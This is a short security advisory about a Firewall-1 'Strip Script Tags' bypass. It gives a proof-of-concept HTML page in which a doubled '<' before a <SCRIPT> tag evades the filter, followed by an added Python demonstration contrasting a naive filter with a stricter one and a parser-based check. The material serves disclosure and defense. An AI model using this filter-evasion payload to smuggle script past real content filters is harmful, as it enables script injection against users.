Firewall-1 Allows Script Rule Circumvention
Reported January 30, 2000 by Arne Vidstrom
VERSIONS AFFECTED
  • Firewall-1

DESCRIPTION

The "Strip Script Tags" feature in FW-1 can be circumvented by adding an extra less-than sign (<) before the actual <SCRIPT> tag in the body of an HTML document.

For example, the following code works to bypass Firewall-1 rules.

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

The code seen above will pass through the firewall unchanged and execute on the desktop under both Netscape Navigator and Internet Explorer. This was tested on version 3.0 of Firewall-1 running on Windows NT 4.0.
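
Why a filter can miss this input, as an added example that is not from the advisory or from the vendor: `naive_strip` is a hypothetical model (FW-1's actual implementation is not described here) that treats everything from a `<` to the next `>` as one tag and checks its first word, while `strict_strip` escapes any `<` that begins a script tag. `script_tags_seen` is an assumed helper that uses Python's standard `html.parser` to report what a tolerant HTML parser still sees after filtering.

```python
import re
from html.parser import HTMLParser

# The advisory's test document (from the page) and a well-formed control case.
BYPASS_DOC = '<HTML>\n<HEAD>\n<<SCRIPT LANGUAGE="JavaScript">\nalert("hello world")\n</SCRIPT>\n</HEAD>\n<BODY>\ntest\n</BODY>\n</HTML>\n'
PLAIN_DOC = BYPASS_DOC.replace("<<SCRIPT", "<SCRIPT")


def naive_strip(html):
    """Hypothetical filter model: '<' up to the next '>' is one tag, named by its first word."""
    def repl(m):
        words = m.group(1).split()
        if words and words[0].lower() == "script":
            return "&lt;" + m.group(1) + ">"   # neutralise the opening tag
        return m.group(0)                      # "<<SCRIPT" is named "<SCRIPT": passed through
    return re.sub(r"<([^>]*)>", repl, html)


def strict_strip(html):
    """Escape every '<' that begins a script open or close tag, wherever it occurs."""
    return re.sub(r"<(?=/?script\b)", "&lt;", html, flags=re.IGNORECASE)


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags as a tolerant HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def script_tags_seen(html):
    """Number of script start tags still present after parsing the given HTML."""
    parser = _ScriptCounter()
    parser.feed(html)
    parser.close()
    return parser.count


if __name__ == "__main__":
    for name, f in (("naive", naive_strip), ("strict", strict_strip)):
        for label, doc in (("plain", PLAIN_DOC), ("bypass", BYPASS_DOC)):
            print(name, label, "script tags after filtering:", script_tags_seen(f(doc)))
```

`strict_strip` covers only the script-tag case this advisory concerns; checking filter output with a real HTML parser, as `script_tags_seen` does, is what catches a mismatch between the filter's idea of a tag and the browser's.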

VENDOR RESPONSE

Check Point is aware of the issue; however, no response was known at the time of this writing.

CREDITS
Discovered by Arne Vidstrom